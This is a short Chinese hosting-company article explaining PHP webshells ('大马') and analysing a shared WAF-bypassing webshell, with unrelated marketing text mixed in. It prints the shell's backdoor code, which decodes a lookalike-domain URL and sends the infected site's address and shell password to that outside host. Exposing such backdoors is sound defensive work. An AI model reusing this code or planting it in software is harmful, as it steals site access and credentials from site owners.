重庆分公司,新征程启航
为企业提供网站建设、域名注册、服务器等服务
大马:指木马病毒;php大马,就是php写的提取站点权限的程序;因为带有提权或者修改站点功能,所以称为叫木马。
创新互联专注于长春网站建设服务及定制,我们拥有丰富的企业做网站经验。 热诚为您提供长春营销型网站建设,长春网站制作、长春网页设计、长春网站官网定制、小程序开发服务,打造长春网络公司原创品牌,更为您提供长春网站排名全网营销落地服务。
有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次
一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。
就是个简单的基于base64加gzinflate加密
后门部分:
if(isset($_GET['login'])=='geturl'){ @set_time_limit(10); $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = envlpass; $copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0='); $url=$copyurl.$serveru.'&pass='.$serverp; $url=urldecode($url); GetHtml($url); } function geturl(){ @set_time_limit(10); $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF']; $serverp = envlpass; $copyurl = base64_decode(''); $url=$copyurl.$serveru.'&p='.$serverp; $url=urldecode($url); GetHtml($url); }
以上就是php大马是什么的详细内容,更多请关注创新互联其它相关文章!